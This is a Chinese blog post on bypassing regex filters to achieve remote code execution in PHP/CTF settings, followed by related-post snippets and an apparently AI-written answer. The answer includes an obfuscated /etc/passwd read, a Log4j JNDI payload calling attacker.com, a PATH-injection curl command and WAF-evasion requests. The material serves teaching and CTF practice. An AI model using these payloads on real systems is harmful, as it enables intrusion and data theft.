RCE绕过正则表达式_1

已于 2024-10-25 10:23:02 修改
阅读量585 收藏 10
点赞数 12
分类专栏: 正则表达式 文章标签: 1024程序员节 正则表达式
于 2024-10-24 20:46:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/S3384806792/article/details/143218919
版权

#1024程序员节 | 征文

  • 正则表达式一些常见方法
    • 关于RCE绕过正则表达式的一些常见方法,可以从以下几个方面进行:
    • 1. 利用特殊字符和编码:通过使用如URL编码、Unicode编码、十六进制编码等,可以绕过一些简单的正则表达式过滤。例如,将空格替换为%09、%0b或$IFS等,或者使用反引号(\`)和单引号(')来绕过对某些特殊字符的过滤。
    • 2. 利用正则表达式的回溯限制:正则表达式在处理复杂模式时可能会使用大量的回溯,这可以通过构造特定的输入来使正则表达式进入无限回溯,从而导致拒绝服务攻击(ReDoS)。在某些情况下,可以通过控制回溯的次数来绕过正则表达式的过滤。
    • 3. 利用逻辑运算符:通过使用逻辑运算符如异或(XOR)、或(OR)等,可以将不可打印的字符转换为可打印的字符,从而绕过正则表达式的过滤。例如,两个不可打印的字符异或可能得到一个可打印的字符,这样就可以构造出需要的命令或代码。
    • 4. 利用PHP的特性:在PHP中,可以利用一些语言特性来绕过正则表达式的过滤。例如,使用变量变量($$var)、动态函数调用(call_user_func)等。
    • 5. 利用WAF(Web应用防火墙)的配置错误:WAF的规则通常是基于正则表达式编写的,如果配置不当,可能会存在绕过的可能性。例如,某些WAF可能没有正确处理编码或特殊字符,或者没有考虑到所有的攻击向量。
    • 6. 利用服务器特性:不同的服务器环境可能有不同的解析特性,例如IIS服务器对URL编码的处理可能与Apache不同,这可以被用来绕过WAF的过滤。
    • 7. 无参数RCE:在某些情况下,RCE的利用可能被限制为无参数的函数调用。这时,可以利用PHP内置的无参数函数,如`phpinfo()`、`var_dump()`等,来读取或输出信息。
    • 8. 利用正则表达式的缺陷:有些正则表达式可能存在缺陷,例如没有正确处理特定的字符或模式,这可以被用来绕过过滤。
  • 正则表达式绕过
    • 一些常见的绕过方法:
    • 异或(XOR)绕过:通过异或操作,可以将不可打印的字符转换为可打印的字符,从而绕过正则表达式的过滤。例如,两个不可打印的字符异或可能得到一个可打印的字符,这样就可以构造出需要的命令或代码。可以通过编写脚本来生成所有可能的异或组合,并找到可以绕过正则表达式的字符对 。
    • 取反绕过:取反操作可以将字符转换为其相反的ASCII值,从而绕过正则表达式的过滤。例如,对phpinfo进行取反urlencode编码,可以得到绕过正则的编码字符串 。
    • 或(OR)绕过:与异或类似,或操作可以用来生成可打印的字符,以绕过正则表达式的过滤 。
    •  递增递减运算符绕过:通过使用递增或递减运算符,可以从一个已知的字符开始,生成一系列的字符,包括所有字母和数字,从而绕过过滤 。
    • URL编码和转义字符:使用URL编码或者转义字符来隐藏或转换过滤关键字,例如使用%09代替空格,或者使用反斜杠\\进行转义。
    • 特殊变量和命令替代:使用Shell的特殊变量(如$*、$@)或替代命令(如使用tac代替cat)来绕过关键字过滤。
    • 管道和重定向:利用管道符(|)和重定向符(>、<)来构造复杂的命令,或者使用重定向来绕过空格等字符的过滤。
    • 包含漏洞和伪协议:利用文件包含漏洞或PHP的伪协议(如php://input、data://)来执行命令或读取文件。
    • 编码绕过:使用Base64编码或其他编码方式来隐藏命令或代码,直到执行时才解码执行。
    • 拼接法:通过变量拼接来构造命令,例如设置变量a='fl'和b='ag',然后通过cat $a$b来执行cat flag命令。
    • 正则表达式回溯限制:通过构造特定的输入,使正则表达式进入无限回溯,可能导致拒绝服务攻击(ReDoS),在某些情况下,可以通过控制回溯的次数来绕过正则表达式的过滤。
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 3190
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
2024年网络安全最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(2)
2401_84265972的博客
05-03 1227
/使用1.0就可以绕过if(MD5(GET′name′])==MD5echo $flag;echo ‘?PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
preg_match函数,正则匹配绕过
SsMing的博客
12-27 1万+
以ichunqiu欢乐赛为例子 1.通过.swp 文件恢复出php脚本 vi index.php.swp recover 2.第一关源码为 &lt;?php function areyouok($greeting){    return preg_match('/Merry.*Christmas/is',$greeting); } $greeting=@$_POST['greetin...
正则表达式绕过案例
lin152235的博客
07-21 1212
正则表达式进行绕过,如果要绕过你需要在from前面不要出现不是单词边界,手动加入会报语法错误,所以这里需要考虑mysql中的科学计数法1e1来进行注入绕过,但是还是会出现一个问题就是使用科学计数法来进行查询会占一列,但是前面说到这个users中只有3列超过就会报错,所以直接使用group_concat来进行绕过,因为只能显示3列所以,我们将1,group_concat(…由orderby可以知道这个表一共有3列,那么我们就可以查看2,3列;可以看的出来,第二列存储的是登录密码,第三列是密码。...
常用的正则表达式
weixin_30394333的博客
07-10 242
基本符号: ^ 表示匹配字符串的开始位置 (例外 用在中括号中[ ] 时,可以理解为取反,表示不匹配括号中字符串) $ 表示匹配字符串的结束位置 * 表示匹配 零次到多次 + 表示匹配 一次到多次 (至少有一次) ? 表示匹配零次或一次 | 表示为或者,两项中取一项 ( ) 小括号表示匹配括号中全部字符 [ ] 中括号表示匹配括号中一个字...
RCE-无字母数字绕过正则表达式
2301_78549931的博客
08-13 1482
我们可以通过一些不可见字符进行异或运算得到我们的字母(例如s=urldecode(%08)^urldecode(%7b)),这样是不是就绕过了waf。所以我们只需使用上述方法构造出system("ipconfig"),便可以执行命令,这里可以编写一个简单的php脚本来获取。根据源码,我们发现它过滤了字母数字大小写,所以我们要想实现代码执行,得另想方法构造代码执行。接下来我们可以使用py脚本来获取我们想要构造的payload:、取反的话,基本上用的都是一个不可见字符,所有不会触发到。
绕过正则表达式例子
weixin_52159400的博客
07-19 440
例如/select\b[\s\S]*\bfrom/绕过该类型正则表达式时可采用科学计数法的方式进行绕过。将搜索栏中第二个select删去即可实现。第一行为用户名,第二行为吗,密码第三行为1e1的值。1,当我们查询某数据库信息时,注入失败sqlinjection,被正则表达式所限制。由上图可知成功查询到user表中的数据,且mysql也支持该关键词的实现。但当我们查询数据库用户和密码绕过正则后提示查询范围超出。绕过语句select\b[\s\S]*\b。...
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
无字母数字绕过正则表达式--上传临时文件、异或、或、取反、自增
unexpectedthing的博客
09-10 1205
文章目录 借用羽神的文章,转发是为了自己后面方便看 https://blog.youkuaiyun.com/miuzzx/article/details/108569080?spm=1001.2014.3001.5501
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 948
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)
热门推荐
羽的博客
10-18 1万+
题目例子 <?php error_reporting(0); highlight_file(__FILE__); $code=$_GET['code']; if(preg_match('/[a-z0-9]/i',$code)){ die('hacker'); } eval($code); 我们下面以命令system('ls')为例 一、异或 <?php /*author yu22x*/ $myfile = fopen("xor_rce.txt", "w"); $contents="
正则表达式绕过案例
weixin_55021949的博客
07-20 842
正则表达式
正则表达式案例分析 (一)
weixin_34318326的博客
07-11 321
前言 最近在重新学习正则表达式,把在学习过程中所遇到的案例,还有比较难理解概念用自己的理解分析并整理总结。 如有哪些地方不对,欢迎指正,谢谢!(๑•ᴗ•๑) 本系列使用的JavaScript所支持的正则表达式语法,并推荐你使用 regexr.com/ 去做相应的练习。 假定你已经熟悉元字符,方括号,修饰符,量词及RegExp对象。 如果没有,请先看一遍文档www.w3school.com.cn/j...
正则绕过
v_wus的博客
05-12 2560
正则绕过 一、preg_match() 1.异或绕过 使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字 str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/" for i in range(0, len(str)): for j in range(0, len(str)): a = ord(str[i])^ord(str[j]) print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a
利用正则表达式绕过
lml_0916的博客
07-19 574
这里匹配的时候,以select开头,匹配到了select后,\b匹配的就是边界,\s\S两个在一起使用的话就可以相当于匹配所有字符,“*”匹配0次或者多次;是科学计数法,mysql识别并且单独列出来一列,而且“1e1”可以和from连接在一起使用,系统会认为这是两个命令,所以这样既没有报错,同时也绕过了正则。但是也样并没有完全解决。可以看的出来,第二列存储的是登录密码,第三列是密码。由于上面出现的问题,我们想要绕过的话,就不让出现边界,也就是改变from的值(但是要保证是个单词,并且需要延长,还不能报错).
SQL注入绕过正则及无列名注入
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
PCRE绕过正则
Aiwin的博客
06-19 1219
PCRE绕过正则和例题[NISACTF 2022]middlerce
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 692
正则表达式的学习
rce绕过关键字
最新发布
04-03
<think>嗯,用户想了解RCE漏洞绕过的方法和关键技术点。首先,我需要回忆一下RCE的基本概念。RCE是远程代码执行,攻击者能够在目标系统上执行任意代码,危害极大。用户提到的绕过可能是指绕过现有的防御措施,比如WAF、输入过滤或者沙箱环境。 首先,我得考虑常见的绕过技术。比如,命令注入中的特殊字符绕过,像分号、管道符、反引号这些。有时候,黑名单过滤不完善,可以用编码或替换字符的方式绕过。比如,用十六进制编码或者Base64编码命令,然后解码执行。 然后,用户提供的引用里有提到CVE-2024-0012,是关于身份认证绕过导致RCE的案例。这可能涉及权限提升或认证机制中的漏洞,比如利用会话管理的问题或者Cookie篡改。另外,引用3提到Log4j漏洞,涉及JNDI注入,这类漏洞利用特定的协议或服务来触发,绕过检测可能需要混淆payload,比如使用非常规的协议格式或拆分攻击字符串。 还需要考虑上下文,比如输入验证的漏洞。如果应用对用户输入处理不当,未正确转义或过滤,攻击者可能通过构造特殊输入注入恶意代码。例如,在SQL注入中,使用注释符或大小写混合绕过,类似的方法可能适用于RCE绕过。 另外,环境变量注入也是一种可能。比如,通过控制环境变量参数来执行命令,某些程序可能会信任特定的环境变量,从而导致代码执行。还有,利用动态代码执行函数,如PHP的eval,Python的exec,如果用户输入直接传递给这些函数,没有严格过滤,就会导致RCE。 还有,框架或库的漏洞,比如旧版本的库存在已知漏洞,攻击者可以利用这些未修补的漏洞执行代码。例如,Apache Struts的漏洞曾被广泛利用。 现在要结合用户提供的引用,引用1提到代码审计和静态分析,所以在绕过时可能需要找到代码审计中的疏漏,比如未覆盖的边缘情况。引用2中的认证绕过导致RCE,说明权限提升或绕过认证步骤是关键。引用3中的Log4j漏洞检测被WAF拦截,所以绕过WAF可能需要混淆技术。 总结下来,RCE绕过的方法可能包括:命令注入绕过过滤、利用编码或混淆、认证/授权绕过、框架漏洞利用、上下文敏感攻击(如模板注入)、以及利用信任机制漏洞。 需要确保回答结构清晰,分点说明,每个技术点给出例子,并引用提供的资料。比如,在认证绕过部分引用CVE-2024-0012的例子,在Log4j部分提到引用3的检测方法。 还要注意用户要求使用中文,LaTeX格式的数学表达式,但这个问题可能不太涉及数学公式,所以可能不需要太多数学内容。但如果有涉及变量或代码部分,需要用行内格式,比如$command$。 最后生成相关问题,要围绕RCE绕过的扩展,比如防御措施、特定漏洞分析、检测技术等。</think>### RCE漏洞绕过方法及关键技术点分析 #### 一、常见RCE漏洞绕过方法 1. **命令注入绕过** - **特殊字符替换**:利用黑名单未覆盖的符号(如`$()`、`%0a`、反引号)拼接命令,例如: ```bash # 原始命令:cat /etc/passwd # 绕过形式:c'a't /et$@c/pass''wd ``` - **编码转换**:使用Base64、十六进制或URL编码混淆命令,例如: ```bash echo "bHM=" | base64 -d | sh # 解码后执行"ls" ``` 2. **输入过滤绕过** - **多级嵌套解析**:利用应用层协议(如HTTP参数污染、JSON/XML解析差异)注入恶意代码[^3]。 - **上下文敏感攻击**:在模板注入(SSTI)中,通过构造`${"".getClass().forName("...")}`绕过沙箱限制。 3. **认证/授权绕过** - **会话伪造**:通过Cookie篡改或JWT令牌伪造绕过身份验证(如CVE-2024-0012中的Web界面认证绕过)[^2]。 - **路径遍历**:利用未校验的路径参数访问敏感接口,例如`/admin/../api/exec?cmd=id`。 4. **框架/库漏洞利用** - **动态加载漏洞**:如Log4j的JNDI注入(`${jndi:ldap://attacker.com/exp}`),通过DNS查询混淆绕过WAF检测。 - **反序列化漏洞**:利用Java/Python的反序列化机制触发恶意代码,例如Apache Commons Collections的Gadget链。 #### 二、关键技术点 1. **漏洞链组合** 通过多个漏洞串联实现绕过,例如: - 先绕过认证(CVE-2024-0012)→ 再利用权限提升漏洞(CVE-2024-9474)→ 最终执行任意命令[^2]。 $$ \text{RCE} = \text{认证绕过} \oplus \text{权限提升} \oplus \text{命令执行} $$ 2. **环境依赖利用** 利用目标系统环境变量或依赖库的缺陷,例如: ```bash # 注入环境变量实现命令执行 curl http://target.com/api?input=;export PATH=/tmp:$PATH;malicious-bin ``` 3. **混淆与逃逸技术** - **WAF绕过**:通过分块传输、注释插入或Unicode编码绕过正则匹配,例如: ```http POST /api HTTP/1.1 Transfer-Encoding: chunked 3; x=x\r\ncmd\r\n0\r\n\r\n ``` - **代码混淆**:在PHP中使用`${_GET['a']}`动态调用函数,避免直接出现敏感关键词。 #### 三、防御建议 1. **输入严格校验**:使用白名单机制限制字符集,例如仅允许`[a-zA-Z0-9_]`。 2. **沙箱隔离**:对动态代码执行操作进行资源隔离(如Docker容器)。 3. **依赖库更新**:定期升级框架/库版本(如Log4j升级到2.17.0+)。 4. **纵深防御**:结合WAF、RASP(运行时应用自保护)和代码审计[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值